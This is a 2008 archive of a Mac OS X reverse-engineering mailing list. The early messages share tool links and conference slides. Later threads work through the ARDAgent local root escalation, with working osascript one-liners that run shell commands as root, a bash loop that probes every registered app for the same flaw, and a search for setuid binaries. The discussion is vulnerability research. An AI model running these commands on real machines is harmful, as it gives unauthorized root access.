From nummish at 0x90.org  Wed Jun  4 14:13:39 2008
From: nummish at 0x90.org (nummish)
Date: Wed, 4 Jun 2008 13:13:39 -0500
Subject: [XSO] Tools
Message-ID: <ad2d22a80806041113n67c42a4ewcdd5818e79264180@mail.gmail.com>

Hey all, I'll be presenting a primer to reversing on OS X next weekend
at REcon (http://recon.cx). Part of my slides include a list of
current tools available to aid a reverser on OSX.

So far I have:

otool (stock install)
otx (http://otx.osxninja.com/)
Hex Fiend (http://ridiculousfish.com/hexfiend/)
0xED (http://www.suavetech.com/0xed/0xed.html)
RE:Trace (http://re-tracer.blogspot.com/)
IDA Pro (http://hex-rays.com/idapro/)

scripts:

itsme's objc fixer
(http://nah6.com/~itsme/cvs-xdadevtools/ida/idcscripts/fixobjc.idc)
fileoffset's otx parser (http://fileoffset.blogspot.com/2008/02/lua-script.html)

Are there any more obvious tools (file, gdb, etc) I'm missing that
deserve a mention? Anything obscure that is a huge timesaver?

Also, if any of these are your tools, and you'd prefer I use a
different URL, can you let me know as well?

Thanks.

From DAVID.G.WESTON at saic.com  Wed Jun  4 14:16:35 2008
From: DAVID.G.WESTON at saic.com (David Weston)
Date: Wed, 04 Jun 2008 11:16:35 -0700
Subject: [XSO] Tools
In-Reply-To: <ad2d22a80806041113n67c42a4ewcdd5818e79264180@mail.gmail.com>
Message-ID: <C46C2A13.57F6%david.g.weston@saic.com>

We should have reDBG (ruby programmatic debugger for OS X) ready at RECON.
You might also want to include Charlie Miller's port of PaiMei pyDBG which
really does exist.

--Dave


On 6/4/08 11:13 AM, "nummish" <nummish at 0x90.org> wrote:

> Hey all, I'll be presenting a primer to reversing on OS X next weekend
> at REcon (http://recon.cx). Part of my slides include a list of
> current tools available to aid a reverser on OSX.
> 
> So far I have:
> 
> otool (stock install)
> otx (http://otx.osxninja.com/)
> Hex Fiend (http://ridiculousfish.com/hexfiend/)
> 0xED (http://www.suavetech.com/0xed/0xed.html)
> RE:Trace (http://re-tracer.blogspot.com/)
> IDA Pro (http://hex-rays.com/idapro/)
> 
> scripts:
> 
> itsme's objc fixer
> (http://nah6.com/~itsme/cvs-xdadevtools/ida/idcscripts/fixobjc.idc)
> fileoffset's otx parser
> (http://fileoffset.blogspot.com/2008/02/lua-script.html)
> 
> Are there any more obvious tools (file, gdb, etc) I'm missing that
> deserve a mention? Anything obscure that is a huge timesaver?
> 
> Also, if any of these are your tools, and you'd prefer I use a
> different URL, can you let me know as well?
> 
> Thanks.
> _______________________________________________
> XSO mailing list
> XSO at 0x90.org
> http://0x90.org/mailman/listinfo/xso

Thanks,
David Weston
Security Engineer
Science Application International Corporation
Web:  http://www.saic.com/infosec
Email:DAVID.G.WESTON at saic.com
Office:858-826-5435
Cell:   310-866-9713


From itsme at xs4all.nl  Wed Jun  4 16:05:34 2008
From: itsme at xs4all.nl (itsme)
Date: Wed, 04 Jun 2008 22:05:34 +0200
Subject: [XSO] Tools
In-Reply-To: <ad2d22a80806041113n67c42a4ewcdd5818e79264180@mail.gmail.com>
References: <ad2d22a80806041113n67c42a4ewcdd5818e79264180@mail.gmail.com>
Message-ID: <4846F58E.7090307@xs4all.nl>

nummish wrote:
> Hey all, I'll be presenting a primer to reversing on OS X next weekend
> at REcon (http://recon.cx). Part of my slides include a list of
> current tools available to aid a reverser on OSX.
>
> So far I have:
>
> otool (stock install)
> otx (http://otx.osxninja.com/)
> Hex Fiend (http://ridiculousfish.com/hexfiend/)
> 0xED (http://www.suavetech.com/0xed/0xed.html)
> RE:Trace (http://re-tracer.blogspot.com/)
> IDA Pro (http://hex-rays.com/idapro/)
>
> scripts:
>
> itsme's objc fixer
> (http://nah6.com/~itsme/cvs-xdadevtools/ida/idcscripts/fixobjc.idc)
> fileoffset's otx parser (http://fileoffset.blogspot.com/2008/02/lua-script.html)
>
> Are there any more obvious tools (file, gdb, etc) I'm missing that
> deserve a mention? Anything obscure that is a huge timesaver?
>
> Also, if any of these are your tools, and you'd prefer I use a
> different URL, can you let me know as well?
>   

this was very useful:
http://www.dribin.org/dave/blog/archives/2006/04/22/tracing_objc/


also
http://code-dump.sourceforge.net/
http://www.codethecode.com/projects/class-dump/


more osx hacking links:
http://www.phrack.com/issues.html?issue=63&id=16&mode=txt
http://unixjunkie.blogspot.com/
http://forums.accessroot.com/index.php?showforum=39

willem


From DAVID.G.WESTON at saic.com  Thu Jun  5 15:17:21 2008
From: DAVID.G.WESTON at saic.com (David Weston)
Date: Thu, 05 Jun 2008 12:17:21 -0700
Subject: [XSO] Tools
In-Reply-To: <4846F58E.7090307@xs4all.nl>
Message-ID: <C46D89D1.5866%david.g.weston@saic.com>

Fusil is a file fuzzer which now has OS X support!!

http://fusil.hachoir.org/trac


On 6/4/08 1:05 PM, "itsme" <itsme at xs4all.nl> wrote:

> nummish wrote:
>> Hey all, I'll be presenting a primer to reversing on OS X next weekend
>> at REcon (http://recon.cx). Part of my slides include a list of
>> current tools available to aid a reverser on OSX.
>> 
>> So far I have:
>> 
>> otool (stock install)
>> otx (http://otx.osxninja.com/)
>> Hex Fiend (http://ridiculousfish.com/hexfiend/)
>> 0xED (http://www.suavetech.com/0xed/0xed.html)
>> RE:Trace (http://re-tracer.blogspot.com/)
>> IDA Pro (http://hex-rays.com/idapro/)
>> 
>> scripts:
>> 
>> itsme's objc fixer
>> (http://nah6.com/~itsme/cvs-xdadevtools/ida/idcscripts/fixobjc.idc)
>> fileoffset's otx parser
>> (http://fileoffset.blogspot.com/2008/02/lua-script.html)
>> 
>> Are there any more obvious tools (file, gdb, etc) I'm missing that
>> deserve a mention? Anything obscure that is a huge timesaver?
>> 
>> Also, if any of these are your tools, and you'd prefer I use a
>> different URL, can you let me know as well?
>>   
> 
> this was very useful:
> http://www.dribin.org/dave/blog/archives/2006/04/22/tracing_objc/
> 
> 
> also
> http://code-dump.sourceforge.net/
> http://www.codethecode.com/projects/class-dump/
> 
> 
> more osx hacking links:
> http://www.phrack.com/issues.html?issue=63&id=16&mode=txt
> http://unixjunkie.blogspot.com/
> http://forums.accessroot.com/index.php?showforum=39
> 
> willem
> 
> _______________________________________________
> XSO mailing list
> XSO at 0x90.org
> http://0x90.org/mailman/listinfo/xso

Thanks,
David Weston
Security Engineer
Science Application International Corporation
Web:  http://www.saic.com/infosec
Email:DAVID.G.WESTON at saic.com
Office:858-826-5435
Cell:   310-866-9713


From DAVID.G.WESTON at saic.com  Thu Jun  5 16:52:02 2008
From: DAVID.G.WESTON at saic.com (David Weston)
Date: Thu, 05 Jun 2008 13:52:02 -0700
Subject: [XSO] Tools
In-Reply-To: <C46D89D1.5866%david.g.weston@saic.com>
Message-ID: <C46DA002.5871%david.g.weston@saic.com>

Also don't forget the programmatic debugger vtrace @ www.kenshoto.com/vtrace

Also pygdb http://code.google.com/p/pygdb/


On 6/5/08 12:17 PM, "David  Weston" <david.g.weston at saic.com> wrote:

> Fusil is a file fuzzer which now has OS X support!!
> 
> http://fusil.hachoir.org/trac
> 
> 
> On 6/4/08 1:05 PM, "itsme" <itsme at xs4all.nl> wrote:
> 
>> nummish wrote:
>>> Hey all, I'll be presenting a primer to reversing on OS X next weekend
>>> at REcon (http://recon.cx). Part of my slides include a list of
>>> current tools available to aid a reverser on OSX.
>>> 
>>> So far I have:
>>> 
>>> otool (stock install)
>>> otx (http://otx.osxninja.com/)
>>> Hex Fiend (http://ridiculousfish.com/hexfiend/)
>>> 0xED (http://www.suavetech.com/0xed/0xed.html)
>>> RE:Trace (http://re-tracer.blogspot.com/)
>>> IDA Pro (http://hex-rays.com/idapro/)
>>> 
>>> scripts:
>>> 
>>> itsme's objc fixer
>>> (http://nah6.com/~itsme/cvs-xdadevtools/ida/idcscripts/fixobjc.idc)
>>> fileoffset's otx parser
>>> (http://fileoffset.blogspot.com/2008/02/lua-script.html)
>>> 
>>> Are there any more obvious tools (file, gdb, etc) I'm missing that
>>> deserve a mention? Anything obscure that is a huge timesaver?
>>> 
>>> Also, if any of these are your tools, and you'd prefer I use a
>>> different URL, can you let me know as well?
>>>   
>> 
>> this was very useful:
>> http://www.dribin.org/dave/blog/archives/2006/04/22/tracing_objc/
>> 
>> 
>> also
>> http://code-dump.sourceforge.net/
>> http://www.codethecode.com/projects/class-dump/
>> 
>> 
>> more osx hacking links:
>> http://www.phrack.com/issues.html?issue=63&id=16&mode=txt
>> http://unixjunkie.blogspot.com/
>> http://forums.accessroot.com/index.php?showforum=39
>> 
>> willem
>> 
>> _______________________________________________
>> XSO mailing list
>> XSO at 0x90.org
>> http://0x90.org/mailman/listinfo/xso
> 
> Thanks,
> David Weston
> Security Engineer
> Science Application International Corporation
> Web:  http://www.saic.com/infosec
> Email:DAVID.G.WESTON at saic.com
> Office:858-826-5435
> Cell:   310-866-9713
> 
> _______________________________________________
> XSO mailing list
> XSO at 0x90.org
> http://0x90.org/mailman/listinfo/xso

Thanks,
David Weston
Security Engineer
Science Application International Corporation
Web:  http://www.saic.com/infosec
Email:DAVID.G.WESTON at saic.com
Office:858-826-5435
Cell:   310-866-9713


From nummish at 0x90.org  Tue Jun 17 15:15:56 2008
From: nummish at 0x90.org (nummish)
Date: Tue, 17 Jun 2008 14:15:56 -0500
Subject: [XSO] post-REcon 2008
Message-ID: <ad2d22a80806171215q6f790b60yb92486fa037ca71a@mail.gmail.com>

Just a quick note that I've put my slides/code up from recon. The
structure of the code is sort of a scratchpad for the reversing I've
been doing so it's not necessarily thorough, and isn't totally a
run-once and forget script, some of it's designed for interactive
fixups along the way.

In my slides I refer to RE:Trace, the new link appears to be up now at
http://poppopret.org .. if you haven't taken a look at this
talk/toolset, you really should.

It looks like the subscription size for the list jumped a bit over the
weekend, so hello to everyone who was at my presentation.

From nummish at 0x90.org  Tue Jun 17 18:56:38 2008
From: nummish at 0x90.org (nummish)
Date: Tue, 17 Jun 2008 17:56:38 -0500
Subject: [XSO] post-REcon 2008
In-Reply-To: <ad2d22a80806171215q6f790b60yb92486fa037ca71a@mail.gmail.com>
References: <ad2d22a80806171215q6f790b60yb92486fa037ca71a@mail.gmail.com>
Message-ID: <ad2d22a80806171556u4b7f25bdva7cbbf69abda0e95@mail.gmail.com>

I seem to have forgotten to include the link to the slides. They're at
http://www.0x90.org/releases/REcon2008_iHood.zip

On Tue, Jun 17, 2008 at 2:15 PM, nummish <nummish at 0x90.org> wrote:
> Just a quick note that I've put my slides/code up from recon. The
> structure of the code is sort of a scratchpad for the reversing I've
> been doing so it's not necessarily thorough, and isn't totally a
> run-once and forget script, some of it's designed for interactive
> fixups along the way.
>
> In my slides I refer to RE:Trace, the new link appears to be up now at
> http://poppopret.org .. if you haven't taken a look at this
> talk/toolset, you really should.
>
> It looks like the subscription size for the list jumped a bit over the
> weekend, so hello to everyone who was at my presentation.
>

From sliderule at gmail.com  Fri Jun 20 08:41:57 2008
From: sliderule at gmail.com (Poindexter Frink)
Date: Fri, 20 Jun 2008 08:41:57 -0400
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
Message-ID: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>

Are there archives here?

I joined this list today to see if there was chatter re: subject.

% osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
root

Needs to be run by a user logged in to the windowing system.  If wrong
user, message:

_RegisterApplication(), FAILED TO establish the default connection to
the WindowServer, _CGSDefaultConnection() is NULL.

Then after a timeout delay it returns with an error:

execution error: ARDAgent got an error: Connection is invalid. (-609)

Trojan vector via .app file + mail.

Some machines report of errors:

23:47: execution error: ARDAgent got an error: "whoami" doesn't
understand the do shell script message. (-1708)

Errors occured on a MacBook Pro running 10.5.3, an iBook running
10.4.11 and a g5 PPC OS X Server running 10.4.11 (Server build)

Easily fixable.

From sliderule at gmail.com  Fri Jun 20 10:08:33 2008
From: sliderule at gmail.com (Poindexter Frink)
Date: Fri, 20 Jun 2008 10:08:33 -0400
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>
Message-ID: <4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com>

A brief apology if this is not considered on-topic for this list.

From nummish at 0x90.org  Fri Jun 20 12:28:55 2008
From: nummish at 0x90.org (nummish)
Date: Fri, 20 Jun 2008 11:28:55 -0500
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>
Message-ID: <ad2d22a80806200928tc021abam64bd2b1ff0000a65@mail.gmail.com>

On Fri, Jun 20, 2008 at 7:41 AM, Poindexter Frink <sliderule at gmail.com> wrote:
> Are there archives here?
>

Archives are public on http://0x90.org/pipermail/xso/

From m4cpunk at gmail.com  Sat Jun 21 02:55:09 2008
From: m4cpunk at gmail.com (Dalton Cummings)
Date: Sat, 21 Jun 2008 01:55:09 -0500
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To: <4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com>
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>
	<4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com>
Message-ID: <485CA5CD.2030708@gmail.com>

Seems plenty on topic to me.

While scripting this bug to test other apps on the system, I was able to 
get SecurityAgent.app to execute commands as securityagent. I failed to 
reproduce the issue outside of the Python interactive prompt. Maybe 
someone else could have some fun. Tested on a PowerPC iMac G4 running 
Mac OS X v10.4.11.

osascript -e 'tell app "SecurityAgent" to do shell script "whoami"'

--Dalton

Poindexter Frink wrote:
> A brief apology if this is not considered on-topic for this list.
> _______________________________________________
> XSO mailing list
> XSO at 0x90.org
> http://0x90.org/mailman/listinfo/xso
>
>   


From andre.ludwig at gmail.com  Sat Jun 21 14:39:37 2008
From: andre.ludwig at gmail.com (Andre Ludwig)
Date: Sat, 21 Jun 2008 14:39:37 -0400
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To: <485CA5CD.2030708@gmail.com>
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>
	<4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com>
	<485CA5CD.2030708@gmail.com>
Message-ID: <9d03f28f0806211139o5cf3b482v66ff1d79c0cf5b10@mail.gmail.com>

http://www.macshadows.com/forums/index.php?showtopic=8640&st=530

Some interesting stuff there.

Dre

On Sat, Jun 21, 2008 at 2:55 AM, Dalton Cummings <m4cpunk at gmail.com> wrote:

> Seems plenty on topic to me.
>
> While scripting this bug to test other apps on the system, I was able to
> get SecurityAgent.app to execute commands as securityagent. I failed to
> reproduce the issue outside of the Python interactive prompt. Maybe
> someone else could have some fun. Tested on a PowerPC iMac G4 running
> Mac OS X v10.4.11.
>
> osascript -e 'tell app "SecurityAgent" to do shell script "whoami"'
>
> --Dalton
>
> Poindexter Frink wrote:
> > A brief apology if this is not considered on-topic for this list.
> > _______________________________________________
> > XSO mailing list
> > XSO at 0x90.org
> > http://0x90.org/mailman/listinfo/xso
> >
> >
>
> _______________________________________________
> XSO mailing list
> XSO at 0x90.org
> http://0x90.org/mailman/listinfo/xso
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://0x90.org/pipermail/xso/attachments/20080621/e7434706/attachment.htm 

From m4cpunk at gmail.com  Sun Jun 22 20:06:13 2008
From: m4cpunk at gmail.com (Dalton Cummings)
Date: Sun, 22 Jun 2008 19:06:13 -0500
Subject: [XSO] Debugger Project
Message-ID: <485EE8F5.8090201@gmail.com>

As I do every year, I'm picking up some projects to work on for the 
summer. This year I though it'd be really fun to play with debugging and 
see how it all works. The issue, however, isn't with debugging, it's 
with disassembly.

Specifically, I'm looking for a PowerPC disassembly library that's 
pretty easy to use, written in C, C++, or Objective-C. I've done tons of 
Googleing and haven't found a whole lot. Eventually the project will 
support Intel Macs, so it would be nice if the library could be ported 
to support both, but right now I'm really just focusing on PowerPC Macs.

So if anybody has any ideas or could point me in the right direction, 
I'd be truly thankful. :-)

Thanks,
Dalton

From dblyth at gmail.com  Mon Jun 23 02:44:22 2008
From: dblyth at gmail.com (David Blyth)
Date: Sun, 22 Jun 2008 23:44:22 -0700
Subject: [XSO] Debugger Project
In-Reply-To: <485EE8F5.8090201@gmail.com>
References: <485EE8F5.8090201@gmail.com>
Message-ID: <3b16b5700806222344s649bce7j15a557373c25b398@mail.gmail.com>

The source code to otool is available, and I believe it supports disassembly
for intel and ppc.
http://www.opensource.apple.com/darwinsource/10.5.3/cctools-667.3/otool/

Let me know if that seems helpful -- I didn't dig through the source very
much.

David


On Sun, Jun 22, 2008 at 5:06 PM, Dalton Cummings <m4cpunk at gmail.com> wrote:

> As I do every year, I'm picking up some projects to work on for the
> summer. This year I though it'd be really fun to play with debugging and
> see how it all works. The issue, however, isn't with debugging, it's
> with disassembly.
>
> Specifically, I'm looking for a PowerPC disassembly library that's
> pretty easy to use, written in C, C++, or Objective-C. I've done tons of
> Googleing and haven't found a whole lot. Eventually the project will
> support Intel Macs, so it would be nice if the library could be ported
> to support both, but right now I'm really just focusing on PowerPC Macs.
>
> So if anybody has any ideas or could point me in the right direction,
> I'd be truly thankful. :-)
>
> Thanks,
> Dalton
> _______________________________________________
> XSO mailing list
> XSO at 0x90.org
> http://0x90.org/mailman/listinfo/xso
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://0x90.org/pipermail/xso/attachments/20080622/8d472b52/attachment.htm 

From gammah at gmail.com  Mon Jun 23 15:20:09 2008
From: gammah at gmail.com (Gammah Radiation)
Date: Mon, 23 Jun 2008 14:20:09 -0500
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To: <9d03f28f0806211139o5cf3b482v66ff1d79c0cf5b10@mail.gmail.com>
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>
	<4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com>
	<485CA5CD.2030708@gmail.com>
	<9d03f28f0806211139o5cf3b482v66ff1d79c0cf5b10@mail.gmail.com>
Message-ID: <a77b1a520806231220p6a2c0fa1l73ed7bd0b69a97bb@mail.gmail.com>

I was looking for a way to "tell app"s to do stuff, and came up with
this: Beware this may lock you out of your machine so make sure you
have ssh running or something...

This is a bash loop:

for x in `/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister
-dump | grep identifier | sed -e's/.*identifier:  *\(.*\)(.*).*/\1/' |
sort -u` ; do ( echo "App ID:" $x ; osascript -e 'tell app id "'${x}'"
to do shell script "id"'; ) >> osascript.log ; done

Looks like doing tell app id com.apple.LockScreen to do shell script
id will lock your OSX UI out with the nice giant padlock icon that
they use in screen sharing to lock out the local user. This loop got
uid 0 via ARDAgent on a box still vuln to the ARDAgent issue. It did
not find a second one.

I started out looking for setuid binaries at paths matching
Myapp.app/Contents/Macos/Myapp -- there seemed to be none that were
setuid iirc -- there were a few setgid tho. That search was done like
so:

find / -type d -regex .*\.app -print0 -exec find {} -perm -4000 -o
-perm -2000 \;

In my testing, I have not yet been able to get a setgid procview
process run from any of the setgid binaries (with this stupid
applescript stuff).

From gammah at gmail.com  Mon Jun 23 15:29:04 2008
From: gammah at gmail.com (Gammah Radiation)
Date: Mon, 23 Jun 2008 14:29:04 -0500
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To: <a77b1a520806231220p6a2c0fa1l73ed7bd0b69a97bb@mail.gmail.com>
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>
	<4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com>
	<485CA5CD.2030708@gmail.com>
	<9d03f28f0806211139o5cf3b482v66ff1d79c0cf5b10@mail.gmail.com>
	<a77b1a520806231220p6a2c0fa1l73ed7bd0b69a97bb@mail.gmail.com>
Message-ID: <a77b1a520806231229l2d493779wa4b12572f69b406f@mail.gmail.com>

So the setuid/gid binaries inside app bundles looked like this list on
my target box:
-rwsrwxr-x  1 root  wheel      55344 Oct  8  2007 /Applications/System
Preferences.app/Contents/Resources/installAssistant
-rwsr-xr-x  1 root  admin     119760 Dec 19  2007
/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool
-rwsr-xr-x  1 root  admin      83200 Jan 22 21:16
/Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy
-rwsr-xr-x  1 root  admin      55760 Sep 24  2007
/Applications/Utilities/ODBC
Administrator.app/Contents/Resources/iodbcadmintool
-rwxr-sr-x  1 root  procmod   194944 Sep 24  2007
/Developer/Applications/Performance
Tools/CHUD/Saturn.app/Contents/MacOS/Saturn
-rwxr-sr-x  1 root  procmod   659168 Sep 24  2007
/Developer/Applications/Performance
Tools/Shark.app/Contents/MacOS/Shark
-rwsr-sr-x  1 root  wheel      18292 Sep 24  2007
/System/Library/CoreServices/Expansion Slot
Utility.app/Contents/Resources/PCIELaneConfigTool
-rwsr-xr-x  1 root  wheel      38432 Jan 25 15:54
/System/Library/CoreServices/Finder.app/Contents/Resources/OwnerGroupTool
-rwsr-xr-x  1 root  wheel    1439952 Nov 15  2007
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
-rwsr-xr-x  1 root  wheel      55808 Sep 23  2007
/System/Library/CoreServices/SecurityFixer.app/Contents/Resources/securityFixerTool
-rws--x--x  1 root  daemon     65008 Feb 26 22:52
/System/Library/Filesystems/AppleShare/check_afp.app/Contents/MacOS/check_afp

Looks like Saturn, Shark, ARDAgent, and check_afp follow the pattern I
think is vulnerable, namely, they reside at
<VULN>.app/ContentsMacOS/<VULN>

Shark and Saturn are dev tools, and are only setgid procview, since
are debug-like tools. It seems to me that the setgid bit isn't honored
when doing applescript, because none of these apps report an elevated
gid.

check_afp is the only other setuid binary, but doesn't seem to
understand do shell script...

From gammah at gmail.com  Mon Jun 23 15:29:45 2008
From: gammah at gmail.com (Gammah Radiation)
Date: Mon, 23 Jun 2008 14:29:45 -0500
Subject: [XSO] Archives? Re : ARDAgent scripting escalation flaw
In-Reply-To: <a77b1a520806231229l2d493779wa4b12572f69b406f@mail.gmail.com>
References: <4455adde0806200541i5e44150an58eeee81c06e6e19@mail.gmail.com>
	<4455adde0806200708j3bfa1a81h3bee20126ad0fe1e@mail.gmail.com>
	<485CA5CD.2030708@gmail.com>
	<9d03f28f0806211139o5cf3b482v66ff1d79c0cf5b10@mail.gmail.com>
	<a77b1a520806231220p6a2c0fa1l73ed7bd0b69a97bb@mail.gmail.com>
	<a77b1a520806231229l2d493779wa4b12572f69b406f@mail.gmail.com>
Message-ID: <a77b1a520806231229n5947f9cew638cd01498292eb1@mail.gmail.com>

Sorry for what appears to be broke long lines...